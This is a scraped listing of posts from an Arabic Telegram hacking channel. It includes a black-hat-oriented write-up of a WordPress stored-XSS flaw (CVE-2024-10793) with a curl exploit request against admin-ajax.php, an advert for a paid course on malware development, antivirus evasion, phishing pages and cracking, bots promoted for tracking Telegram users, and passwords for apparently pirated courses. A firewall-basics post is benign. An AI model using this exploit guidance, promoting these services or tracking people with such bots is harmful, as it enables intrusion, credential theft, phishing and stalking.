en
Feedback
ExploitQuest

ExploitQuest

Open in Telegram

contact: @ExploitQuestbot

Show more
The country is not specifiedTechnologies & Applications14 073
6 808
Subscribers
No data24 hours
+97 days
+12430 days
Posts Archive
'","datePublished":"2024-12-21T02:03:13Z","dateModified":"2024-12-21T02:03:13Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":974},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":10}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/87","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/87","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/87","headline":"https://t.me/XCODE0X90 قناتي التانية","articleBody":"https://t.me/XCODE0X90\n\nقناتي التانية","datePublished":"2024-12-20T13:13:03Z","dateModified":"2024-12-20T22:47:59Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":155},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/86","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/86","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/86","headline":"الـ CVE-2024-10793 تعتبر ثغرة خطيرة موجودة في إضافة WP Activity Log الخاصة بمنصة WordPress وهي بتصنف كـ Store…","articleBody":"الـ CVE-2024-10793 تعتبر ثغرة خطيرة موجودة في إضافة WP Activity Log الخاصة بمنصة WordPress وهي بتصنف كـ Stored XSS يعني هجوم عبر النصوص البرمجية المخزنة الثغرة دي بتتواجد في كل النسخ اللي قبل الإصدار 5.2.1 وبتسمح للمهاجم إنه يحقن أكواد JavaScript خبيثة داخل النظام الهدف وده من خلال استغلال الباراميتر user_id في طلبات الـ AJAX الخاصة بوظيفة destroy-sessions لما بيتم إرسال الطلب ده مع قيمة user_id تحتوي على كود JavaScript خبيث زي الكود ده بيتم تخزينه في قاعدة البيانات الخاصة بـ WordPress وبيتنفذ تلقائياً لما أي مستخدم أو أدمن يزور الصفحة اللي فيها البيانات دي دلوقتي خلينا نفهم ليه الثغرة دي خطيرة لو المهاجم نجح في استغلال الثغرة وحقن كود JavaScript خبيث الكود ده ممكن يتسبب في سرقة الكوكيز الخاصة بالمستخدمين بما في ذلك كوكيز الجلسات اللي ممكن يتم استخدامها لتسجيل الدخول لحسابات المستخدمين أو حتى حساب الأدمن نفسه بالإضافة لكده المهاجم ممكن يستخدم الكود الخبيث ده لإعادة توجيه المستخدمين لصفحات تصيد أو تحميل برمجيات خبيثة على أجهزتهم بشكل غير مرئي بالنسبة لهم وده يفتح الباب لعمليات أكبر زي تنفيذ هجمات متقدمة APT اللي بتستهدف بنية الموقع بالكامل المهاجم لو كان من نوعية البلاك هات ممكن يطور الاستغلال ده عن طريق دمجه مع أفكار تانية زي مثلا تنفيذ هجوم Chain Attack يعني إنه يستخدم الثغرة دي كمدخل لجلب معلومات أكتر عن السيرفر أو عن باقي الإضافات والملفات المرتبطة بالموقع المهاجم ممكن كمان يبرمج Bot أو Script أو حتى يستخدم أدوات جاهزة زي Burp Suite عشان ينفذ هجمات مكثفة Automated Scans على جميع صفحات الموقع أو يجرب حقن كود مختلف في كل محاولة عشان يوسع دائرة التأثير من ناحية تانية البلاك هات اللي عنده خبرة أعمق ممكن يستخدم هجوم XSS ده كجزء من حملة أكبر على شبكة كاملة لو الموقع ده ضمن شبكة كبيرة أو له تأثير واسع على المستخدمين ممكن المهاجم يدمج بين الـ XSS وهجمات أخرى زي SQL Injection أو Remote Code Execution لو كان فيه ثغرات أخرى مكشوفة في نفس المنصة أو الإضافات المرتبطة بيها ولتنفيذ هجوم متكامل من نوع APT Advanced Persistent Threat المهاجم بيبدأ باكتساب وصول أولي للموقع من خلال الثغرة دي وبعد كده يثبت وجوده على السيرفر عن طريق زرع Backdoor أو Webshell وبعدها يبدأ يجمع المعلومات عن باقي النظام أو حتى عن المستخدمين المرتبطين بيه المهاجم المحترف ممكن كمان يستغل الـ XSS عشان يزرع Keylogger بسيط داخل الموقع يسجل أي مدخلات بيكتبها المستخدمين بما فيها بيانات تسجيل الدخول لكده لو بتفكر كهاكر أو حتى كمدير نظام أمان لازم تبقى عارف إن معالجة الثغرات دي بتتطلب فهم شامل لتقنيات الأمان زي تعطيل أي باراميتر بيتم تمريره للمستخدم بدون التحقق منه أو تعقيم كل المدخلات Sanitization قبل تخزينها في قاعدة البيانات وكمان استخدام أدوات مثل WAF Web Application Firewall عشان تمنع استغلال الثغرات دي بشكل فوري ولكن من منظور البلاك هات اللي عايز يستغل الثغرة دي كجزء من مشروع أكبر الفكرة إنك بتستخدمها كمدخل للأنظمة بتستفيد من أكواد الجافاسكريبت الخبيثة لتحصل على السيطرة على الجلسات وبعد كده تبدأ توسع السيطرة من خلال فهم كامل للبنية التحتية للنظام والعمل على نقاط ضعفه بالشكل الأنسب لحملات الاختراق المطولة\n\nالاستغلال \n\ncurl -X POST 'http://example.com/wp-admin/admin-ajax.php' \\\n -d 'action=destroy-sessions&user_id='","datePublished":"2024-12-19T22:25:18Z","dateModified":"2024-12-26T19:18:16Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":569},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/85","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/85","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/85","headline":"@BLACK_HAT_SAVE0bot يا شباب ده بوت قوي جدا في جمع المعلومات عن معرف تلي","articleBody":"@BLACK_HAT_SAVE0bot\n\nيا شباب ده بوت قوي جدا في جمع المعلومات عن معرف تلي","datePublished":"2024-12-19T12:34:06Z","dateModified":"2024-12-19T21:36:27Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":156},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/84","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/84","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/84","headline":"@BLACK_HAT_SAVE0bot يا شباب ده بوت قوي جدا في جمع المعلومات عن معرف تلي","articleBody":"@BLACK_HAT_SAVE0bot\n\nيا شباب ده بوت قوي جدا في جمع المعلومات عن معرف تلي","datePublished":"2024-12-18T05:25:31Z","dateModified":"2024-12-19T12:34:04Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":230},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/82","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/82","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/82","headline":"Password: hide01.ir @Hide01 📰 @RedBlueHit 💀👀 @RedBlueTM 🔒","articleBody":"Password: hide01.ir\n\n@Hide01 📰\n@RedBlueHit 💀👀\n@RedBlueTM 🔒","datePublished":"2024-12-16T12:53:36Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":155},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/81","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/81","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/81","headline":"https://www.udemy.com/course/windows-access-tokens-for-red-teamers/ Password: hide01.ir @Hide01 📰 @RedBlueHit…","articleBody":"https://www.udemy.com/course/windows-access-tokens-for-red-teamers/\n\nPassword: hide01.ir\n\n@Hide01 📰\n@RedBlueHit 💀👀\n@RedBlueTM 🔒","datePublished":"2024-12-16T12:53:36Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":154},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/80","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/80","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/80","headline":"https://t.me/+WICDQkp0B00xMDFk مجتمع ممتاز جدا يا شباب","articleBody":"https://t.me/+WICDQkp0B00xMDFk\n\n\nمجتمع ممتاز جدا يا شباب","datePublished":"2024-12-16T12:49:23Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":146},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/79","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/79","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/79","headline":"https://t.me/+WICDQkp0B00xMDFk مجتمع ممتاز جدا يا شباب","articleBody":"https://t.me/+WICDQkp0B00xMDFk\n\n\nمجتمع ممتاز جدا يا شباب","datePublished":"2024-12-16T12:48:50Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":123},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-16T12:48:31Z"}}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/78","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/78","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/78","headline":"https://t.me/wa3i_tech اشتركوا اخويا مستر دارك بينشر حاجات حلوة","articleBody":"https://t.me/wa3i_tech\n\n\nاشتركوا اخويا مستر دارك بينشر حاجات حلوة","datePublished":"2024-12-16T12:33:34Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":116},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-16T12:28:00Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/77","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/77","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/77","headline":"< اساسيات عن الفايروول لازم تكون عارفها كمهندس شبكات > 1. إعداد القواعد (Firewall Rules): أهم شيء في الفايروو…","articleBody":"< اساسيات عن الفايروول لازم تكون عارفها كمهندس شبكات >\n\n1. إعداد القواعد (Firewall Rules):\nأهم شيء في الفايروول هو القواعد اللي تتحكم في حركة المرور بين الشبكة الداخلية والعالم الخارجي. تبدأ بقاعدة تمنع جميع الاتصالات (deny all)، بعدها تبدأ تضيف القواعد اللي تسمح بحركة مرور معينة بناءً على البروتوكول، المنفذ (port)، وعنوان الـ IP. الفكرة هي إنك تسمح فقط باللي تحتاجه وتمنع كل شيء غير ضروري.\n\n2. تصفية المنافذ (Port Filtering):\nلكل خدمة أو بروتوكول في الشبكة فيه منفذ معين، فبدل ما تفتح كل المنافذ، الفايرول بيسمحلك تفتح بس المنافذ اللي محتاجها. يعني مثلاً HTTP بيستخدم المنفذ 80، و HTTPS بيستخدم المنفذ 443. خلي بالك دايماً إن المنافذ اللي مفتوحة تكون بس للتطبيقات اللي ضروري تستخدمها.\n\n3. التحكم في الوصول (Access Control):\nمهم تحدد بالظبط مين اللي يقدر يدخل الشبكة، سواء من جوه الشبكة أو من بره. ده ممكن يتعمل عن طريق تصفية الـ IP addresses أو تحديد السياسات حسب المواقع الجغرافية أو النطاقات. لازم دايماً يكون عندك تحكم مضبوط في عمليات الدخول والخروج.\n\n4. كشف التهديدات ومنعها (IDS/IPS):\nفيه أنواع من الفايرول بتدعم أنظمة كشف التهديدات (IDS) أو منعها (IPS). الـ IDS بيكشف الأنشطة المشبوهة أو محاولات الاختراق، لكن الـ IPS بياخد خطوة أبعد وبيمنع الهجمات أوتوماتيك. وجود الأنظمة دي بيوفر مستوى أمان عالي جداً وبيخليك عارف بأي محاولة اختراق قبل ما تحصل.\n\n5. التسجيل والمراقبة (Logging & Monitoring):\nمتابعة النشاطات وتسجيلها حاجة ضرورية عشان تعرف حالة الشبكة، وتقدر تتابع أي محاولات اختراق أو نشاطات غير مصرح بيها. السجلات دي بتساعدك كمان في تشخيص المشاكل وتحليل الأحداث بعد ما تحصل.\n\n6. تقنيات الـ VPN (Virtual Private Network):\nلو عندك موظفين بيشتغلوا من البيت أو فروع تانية محتاجة تدخل على الشبكة الداخلية، استخدم الـ VPN. الفايرول يقدر يسمحلك بإنشاء شبكات افتراضية خاصة عشان تضمن إن الاتصالات تكون آمنة ومفيش بيانات تتعرض للسرقة أثناء النقل.\n\n7. الـ NAT (Network Address Translation):\nخاصية الـ NAT في الفايرول بتسمح بترجمة عناوين الـ IP المحلية لعناوين عامة لما تخرج على الإنترنت. العملية دي بتزود مستوى الخصوصية في الشبكة وبتقلل الهجمات اللي بتستهدف العناوين الداخلية.\n\n8. الحماية من الهجمات الشائعة (Common Attack Protections):\nلازم تتأكد إن الفايرول مضبوط على الحماية من هجمات الـ DDoS، الـ Spoofing، وهجمات الـ Man-in-the-middle. الفايرول اللي بيتعامل مع الهجمات دي بشكل فعال بيديك راحة وبيضمن أمان الشبكة.\n\nإعدادات الـ DMZ (Demilitarized Zone):\nلو بتدير شبكة فيها سيرفرات تفاعلية زي مواقع الويب أو سيرفرات الإيميلات، إنشاء منطقة معزولة (DMZ) بين الشبكة الداخلية والإنترنت بيعزز الحماية. الفايرول بيسمحلك تعمل المنطقة دي كحاجز بين السيرفرات والبيانات الحساسة.\n\nالتحديثات والصيانة الدورية:\nالفايرول لازم يتحدث باستمرار عشان يقفل أي ثغرات أمنية ممكن تظهر مع الوقت. المهندسين اللي بيهملوا التحديثات بيعرضوا الشبكة للخطر.","datePublished":"2024-12-16T12:33:34Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":124},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-10-21T05:46:05Z"}}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/76","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/76","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/76","headline":"Password: @Professor_Technology","articleBody":"Password:\n @Professor_Technology","datePublished":"2024-12-16T11:44:30Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":137},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-13T17:10:17Z"}}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/75","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/75","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/75","headline":"Password: @Professor_Technology","articleBody":"Password: \n@Professor_Technology","datePublished":"2024-12-16T11:44:30Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":135},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-13T17:10:17Z"}}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/74","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/74","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/74","headline":"Password: @Professor_Technology","articleBody":"Password: \n@Professor_Technology","datePublished":"2024-12-16T11:44:30Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":145},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-13T17:10:17Z"}}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/73","url":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/73","mainEntityOfPage":"https://telemetr.io/en/channels/1941018014-exploitquest/posts/73","headline":"Password: @Professor_Technology","articleBody":"Password: \n@Professor_Technology","datePublished":"2024-12-16T11:44:30Z","dateModified":"2024-12-16T20:44:50Z","author":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"publisher":{"@type":"Organization","name":"ExploitQuest","url":"https://telemetr.io/en/channels/1941018014-exploitquest","image":"https://img.tlmtr.io/c/27mjsa/5951799859155683023?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":145},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2024-12-13T17:10:17Z"}}}]}
+1
💻 Disclosed vulnerabilities with bug bounty, part 9 1️⃣ Account takeover via Self-XSS An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details. 2️⃣ SQL injection in POST request Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here. 3️⃣ OTP Bypass Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here. #web #xss #sqli

Repost from KILLER CODE
"لو نفسك تدخل عالم البلاك هات من أوسع أبوابه وتتعلم كل الأساليب الخاصة بيهم في المجال، الفرصة قدامك دلوقتي! 👍 بقدم ليك دورة Black Hat ⬆️ اللي هتوسع مداركك 💪 في المجال الدورة دي هتكون مكثفة ، وهتركز على المجالات التالية : تطوير المالوير (Malware Development 🦠) : في الجزء ده هتتعلم إزاي تصمم برمجيات خبيثة باحترافية باستخدام تقنيات متطورة. هتعرف إزاي تبني برامج قادرة على التهرب من برامج الحماية (Antivirus Evasion) وتحقيق السيطرة الكاملة على الأجهزة المستهدفة. هتتعلم تقنيات مثل الـPayload Engineering والـObfuscation وكتابة برمجيات متقدمة بلغة Assembly أو C++، بالإضافة إلى إنشاء فيروسات متطورة قادرة على التسلل للشبكات أو سرقة البيانات. صناعة الـ Exploits ⭐️: ده الجزء اللي هيحولك من مجرد هاكر مبتدئ لمتخصص قادر على استغلال الثغرات الأمنية باحتراف. هتعرف إزاي تكتشف الثغرات بنفسك، سواء كانت في البرمجيات أو الأنظمة، وتبني أدوات خاصة بيك لاستغلالها. هتتعلم Buffer Overflow، Format String Vulnerabilities، واستخدام أدوات مثل GDB وImmunity Debugger لتحليل التطبيقات واستخراج نقاط الضعف. 🔴Binary Exploitation: لو عايز تدخل لعالم الهندسة العكسية وتحليل البرمجيات من أوسع أبوابه، الجزء ده هيكون محطة أساسية. هتتعلم قراءة وتحليل الأكواد الثابتة والديناميكية، اكتشاف الثغرات في البرامج عن طريق تفكيك الملفات التنفيذية (Disassembling)، وكمان كتابة أكواد لاستغلالها بشكل احترافي. بالإضافة إلى فهم عميق لبنية البرامج وكيفية التعامل مع أنظمة التشغيل بطرق جديدة. أساليب التصيد (Phishing)⚠️: هنا هتتعلم واحدة من أخطر تقنيات الهجوم اللي بيستخدمها البلاك هات. هتكتشف إزاي تصمم صفحات وهمية (Fake Pages) مثالية لجذب الضحايا، كتابة رسائل بريد إلكتروني احترافية تخدع المستلمين، واستخدام تقنيات الهندسة الاجتماعية لإقناع الهدف بالتفاعل مع الهجمة. ده هيخليك قادر تستهدف الأفراد أو المؤسسات بشكل مباشر وبأعلى فرص نجاح. استغلال الثغرات 💀: ده الجزء اللي هيحولك لماكينة استغلال لا تتوقف. هتتعلم أكتر من ألف طريقة لاختراق أي نظام أو تطبيق باستخدام تقنيات زي SQL Injection، XSS، LFI/RFI، وغيرها. هتتعرف على كيفية استخدام أدوات متقدمة زي Burp Suite وMetasploit، وتحويل الثغرات العادية لهجمات معقدة ومؤثرة. اختراق المواقع: في النهاية، الجزء ده هيركز على فهم الأنظمة المدمجة في المواقع وكيفية تحليلها لاكتشاف نقاط الضعف. هتتعلم إزاي تستغل البنية التحتية للمواقع، تكسر الحمايات زي WAF و غيرها كتير وتحقق السيطرة على السيرفرات المستضيفة. هتستخدم تقنيات زي Web Shells، وهتتعلم إزاي تهاجم المواقع وتستغلها لصالحك و المزيد 💀♾ الهندسة العكسية (Reverse Engineering): هنا هتتعلم إزاي تفكك البرامج خطوة بخطوة علشان تعرف هي شغالة إزاي من جوه. هتفهم تفاصيل الكود وتعرف تطلع منه ثغرات أو حتى تصمم نسخ معدّلة (Cracked Versions) للبرامج الجزء ده بيجمع بين المهارات التقنية والتحليلية وهيديك الأدوات اللي تخليك قادر تفهم أي برنامج مهما كان معقد وتوظفه لصالحك كل جزء هيكون مليان بتطبيقات عملية علشان تتأكد إنك مش بس فاهم، لكن كمان قادر تنفذ فعلياً! وكمان الدورة هتعلمك إزاي تبني أدواتك 🥇 الخاصة وتتعامل مع أقوى أدوات البلاك هات علشان تكون جاهز لأي تحدي 💥 المحتوى معمول بعناية ⭐️ و متعوب جدا عليه وصدقني ده مش مجرد كورس ⭐️، دي تجربة كاملة هتغير مسار مستقبلك للأفضل 💀🥇 الدورة مش رخيصة🤕! لو فعلاً مستعد تستثمر 💰 في نفسك، ده الكورس اللي يستاهل كل دولار 💰هتصرفه عليه لو أنت جاد وعايز تبدأ، كلمنا فوراً على @EIPDZG 🎩🪟 الفرصة مش هتستناك كتير، مستني إيه؟ 🔥"

@K00X90bot بوت ممتاز جدا في جمع المعلومات عن معرف تلي او مجموعة و يعرفك الشخص الي انت حاطط معرفه فين بيروح و فين بيمشي

